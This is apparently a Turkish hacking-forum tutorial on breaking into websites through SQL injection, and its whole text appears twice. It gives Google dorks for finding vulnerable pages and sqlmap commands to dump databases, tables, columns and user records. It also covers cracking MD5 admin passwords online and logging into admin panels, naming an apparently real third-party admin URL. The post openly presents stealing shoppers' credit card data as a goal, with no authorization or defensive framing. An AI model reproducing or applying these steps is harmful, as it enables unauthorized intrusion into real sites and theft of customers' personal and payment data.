Merhaba arkadaşlar kafanıza takılan soruyu bugün size yanıtlayacağım THT Yardım Merkezi'nde bazı arkadaşlarımız sql ile site nasıl hacklerim gibisinden konu açıyordu bugün bende sizlere en ince ayrıntısına kadar sql'i anlatacağım başlayalım.
Sql Nedir ?
(Wikipedia)SQL, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir.
Sitelerde Neden Sql Açığı Bulunur(Olur) ?
Bazı SQL dilinde yazılmış sitelerde hatalar yani açıklar oluşabilir.Bunun nedeni Web Master'lerın yani siteyi yazanların Kod'da hata yapmış olmalarıdır...
SQL Açıklı Siteleri Hacklemenin Mantığı Nedir ?
Arkadaşlar SQL açıklı sitelerde bütün bilgiler "DATABASE"ye saklanır...
Bizler bu açıklardan faydalanarak "DATABASE"ye girebilir ve bilgilerini alabiliriz.Bu bi alışveriş sitesi olsun diyelim.Databaseyi çektiğimiz zaman içindeki müşterilerinde bilgilerini almış oluruz ve onların cc yani Credi Card bilgilerine de ulaşmış oluruz.DATABASE demek herşey demek sadece admin password olarak algılamayın.Araştırın iyice inceleyin DATABASE'leri.
Sql Açıklı Site Nasıl Bulunur ?
Sql açıklı siteleri bulmak için bize dorklar yardımcı olur.Şunu belirtmek isterim açıkları sadece dorklar ile bulmazsınız herhangi bi siteye girdiniz mesela (Sitehaber.com/news.php?id=1) böyle bi sayfaya giriş yaptınız o sayfadaki url'ye " ' " Uygularsanız hata vericektir (Sitehaber.com/news.php?id=1') gibi ve birçok program ile hedef sitelerdeki sql açıklarını bulabilirsiniz.
Ben sizlere kısa ve bilindik dorkları vereceğim dork'un mantığı şudur herhangi bi dork bulabilirsiniz mesela italyan sitesine girdiniz orda " Sayfa " demek " Pagina " Arama yaparken siz page.php?id= kullanıyorsunuz sadece italyaya ait siteleri hacklemek istiyorsanız italyanca kelimelere çevireceksiniz dorkları neyse fazla uzatmadan şöyle dorkları vereyim.
Dorklar ?
news.php?id=
index.php=id=
news_details.php?id=
Dorkları nasıl kullanırız ? ( Resimli Anlatım En Sonda )
-->Evet arkadaşlar bu kısımda yapacağımız şey " Google Yahoo Bing Yandex " gibi arama motorlarına giriyoruz.
-->Herhangi bi dorkumuzu yapıştırıyoruz.(news_details.php?id=)
-->Sitemizi arıyoruz sql açıklı olan ben buldum ( News and Activities | News) Sonuna " ' " getirdiğimiz zaman hata vericektir bana verdiği hata ( ( ! ) Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:\wamp\www\en\news_detail.php on line 47 )
-->Daha sonra havij veya sqlmap'ı açıyoruz.Sitemizi taratmaya başlıyoruz.
-->Daha sonra çıkan db leri çekiyoruz.
-->Username Password dblerini çekiyoruz karşımıza admin password geliyor.(Password'lar arada md5 li çıkabiliyor havijin kendi kırma md5'i var fakat tavsiyem online site https://hashkiller.co.uk/Cracker/MD5 )
-->Şimdi sitemizin admin panelini buluyoruz.(http://www.asiawealth.co.th/admin/)
-->Admin & Password'u yazarak giriş yapıyoruz artık paneldeyiz.
Resimli (Görüntülü) Anlatım
Sqlmap Windows İçin
Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
Sqlmap, veritabanı açıklarını tespit etmek ve kullanmak için kullanılan açık kodlu bir yazılımdır ve kötü niyetli kodları bunlara eklemek için seçenekler sunar. Terminalde kullanıcı arayüzü sağlayan SQL enjeksiyon hatalarını tespit etme ve kullanma işlemini otomatikleştiren bir penetrasyon test aracıdır.
-->İlk olarak Python'u indiriyoruz. (https://www.python.org/downloads/release/python-374/)
-->Daha sonra SQLMAP'ı indiriyoruz. (sqlmap: automatic SQL injection and database takeover tool) hemen sağ tarafta .zip olarak.
-->Kurulumu gerçekleştiriyoruz.(Next diyip geçerek)
-->Sqlmap'da ise ".zip" den çıkan dosyayı Python'nun kurulu olduğu yere atıyorsunuz.Yani C:\Python27 buraya.
-->Python klasörünün içine attığınız dosyanın ismini değiştiriceksiniz (Sqlmap'ın içinden çıkan zip'teki dosya) sqlmapproject-sqlmap-48ac210 dosyasını SQLMap yapacaksınız.
-->Masaüstü > Sağ tık > Yeni > Kısayol diyorsunuz.Ögenin konumuna CMD yazıp ileri diyorsunuz. Kısayol için ad kısmına SQLMap yazıp son diyoruz
-->Kısayol oluşturduktan sonra sağ tıklayıp kısayola özellikler diyin ve başlama yerine Python dosyasının içine attığınız sqlmap dosyasının link ini yazın yani C:\Python27\SQLMap.
Çalıştırmak için yapacağınız şey.
Cd..
Cd desktop
cd sqlmap
Resimli (Görüntülü) Anlatım
Veritabani Çekmek için :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 --dbs
Veritabanındaki Tabloları Çekmek İçin :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables
Kolanları Çekmek İçin :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns
Kullanici Bilgilerini Çekmek İçin
sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Kali linux için sqlmap
Arkadşalar zaten kalilinux'da zaten sqlmap yüklü olarak geliyor şöyle gösteriyim.
Terminali açarak sadece sqlmap yazıyoruz.Windows için geçerli olan komutlar linux için de geçerlidir.
ÇOK ÖNEMLİ BİR NOT ! Admin panelini bulduğunuz sitelere bypass denemeden geçmeyin illa db yi çekmenize gerek yoktur.
Sql Nedir ?
(Wikipedia)SQL, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir.
Sitelerde Neden Sql Açığı Bulunur(Olur) ?
Bazı SQL dilinde yazılmış sitelerde hatalar yani açıklar oluşabilir.Bunun nedeni Web Master'lerın yani siteyi yazanların Kod'da hata yapmış olmalarıdır...
SQL Açıklı Siteleri Hacklemenin Mantığı Nedir ?
Arkadaşlar SQL açıklı sitelerde bütün bilgiler "DATABASE"ye saklanır...
Bizler bu açıklardan faydalanarak "DATABASE"ye girebilir ve bilgilerini alabiliriz.Bu bi alışveriş sitesi olsun diyelim.Databaseyi çektiğimiz zaman içindeki müşterilerinde bilgilerini almış oluruz ve onların cc yani Credi Card bilgilerine de ulaşmış oluruz.DATABASE demek herşey demek sadece admin password olarak algılamayın.Araştırın iyice inceleyin DATABASE'leri.
Sql Açıklı Site Nasıl Bulunur ?
Sql açıklı siteleri bulmak için bize dorklar yardımcı olur.Şunu belirtmek isterim açıkları sadece dorklar ile bulmazsınız herhangi bi siteye girdiniz mesela (Sitehaber.com/news.php?id=1) böyle bi sayfaya giriş yaptınız o sayfadaki url'ye " ' " Uygularsanız hata vericektir (Sitehaber.com/news.php?id=1') gibi ve birçok program ile hedef sitelerdeki sql açıklarını bulabilirsiniz.
Ben sizlere kısa ve bilindik dorkları vereceğim dork'un mantığı şudur herhangi bi dork bulabilirsiniz mesela italyan sitesine girdiniz orda " Sayfa " demek " Pagina " Arama yaparken siz page.php?id= kullanıyorsunuz sadece italyaya ait siteleri hacklemek istiyorsanız italyanca kelimelere çevireceksiniz dorkları neyse fazla uzatmadan şöyle dorkları vereyim.
Dorklar ?
news.php?id=
index.php=id=
news_details.php?id=
Dorkları nasıl kullanırız ? ( Resimli Anlatım En Sonda )
-->Evet arkadaşlar bu kısımda yapacağımız şey " Google Yahoo Bing Yandex " gibi arama motorlarına giriyoruz.
-->Herhangi bi dorkumuzu yapıştırıyoruz.(news_details.php?id=)
-->Sitemizi arıyoruz sql açıklı olan ben buldum ( News and Activities | News) Sonuna " ' " getirdiğimiz zaman hata vericektir bana verdiği hata ( ( ! ) Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:\wamp\www\en\news_detail.php on line 47 )
-->Daha sonra havij veya sqlmap'ı açıyoruz.Sitemizi taratmaya başlıyoruz.
-->Daha sonra çıkan db leri çekiyoruz.
-->Username Password dblerini çekiyoruz karşımıza admin password geliyor.(Password'lar arada md5 li çıkabiliyor havijin kendi kırma md5'i var fakat tavsiyem online site https://hashkiller.co.uk/Cracker/MD5 )
-->Şimdi sitemizin admin panelini buluyoruz.(http://www.asiawealth.co.th/admin/)
-->Admin & Password'u yazarak giriş yapıyoruz artık paneldeyiz.
Resimli (Görüntülü) Anlatım
Sqlmap Windows İçin
Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
Sqlmap, veritabanı açıklarını tespit etmek ve kullanmak için kullanılan açık kodlu bir yazılımdır ve kötü niyetli kodları bunlara eklemek için seçenekler sunar. Terminalde kullanıcı arayüzü sağlayan SQL enjeksiyon hatalarını tespit etme ve kullanma işlemini otomatikleştiren bir penetrasyon test aracıdır.
-->İlk olarak Python'u indiriyoruz. (https://www.python.org/downloads/release/python-374/)
-->Daha sonra SQLMAP'ı indiriyoruz. (sqlmap: automatic SQL injection and database takeover tool) hemen sağ tarafta .zip olarak.
-->Kurulumu gerçekleştiriyoruz.(Next diyip geçerek)
-->Sqlmap'da ise ".zip" den çıkan dosyayı Python'nun kurulu olduğu yere atıyorsunuz.Yani C:\Python27 buraya.
-->Python klasörünün içine attığınız dosyanın ismini değiştiriceksiniz (Sqlmap'ın içinden çıkan zip'teki dosya) sqlmapproject-sqlmap-48ac210 dosyasını SQLMap yapacaksınız.
-->Masaüstü > Sağ tık > Yeni > Kısayol diyorsunuz.Ögenin konumuna CMD yazıp ileri diyorsunuz. Kısayol için ad kısmına SQLMap yazıp son diyoruz
-->Kısayol oluşturduktan sonra sağ tıklayıp kısayola özellikler diyin ve başlama yerine Python dosyasının içine attığınız sqlmap dosyasının link ini yazın yani C:\Python27\SQLMap.
Çalıştırmak için yapacağınız şey.
Cd..
Cd desktop
cd sqlmap
Resimli (Görüntülü) Anlatım
Veritabani Çekmek için :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 --dbs
Veritabanındaki Tabloları Çekmek İçin :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables
Kolanları Çekmek İçin :
sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns
Kullanici Bilgilerini Çekmek İçin
sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Kali linux için sqlmap
Arkadşalar zaten kalilinux'da zaten sqlmap yüklü olarak geliyor şöyle gösteriyim.
Terminali açarak sadece sqlmap yazıyoruz.Windows için geçerli olan komutlar linux için de geçerlidir.
ÇOK ÖNEMLİ BİR NOT ! Admin panelini bulduğunuz sitelere bypass denemeden geçmeyin illa db yi çekmenize gerek yoktur.
Son düzenleme: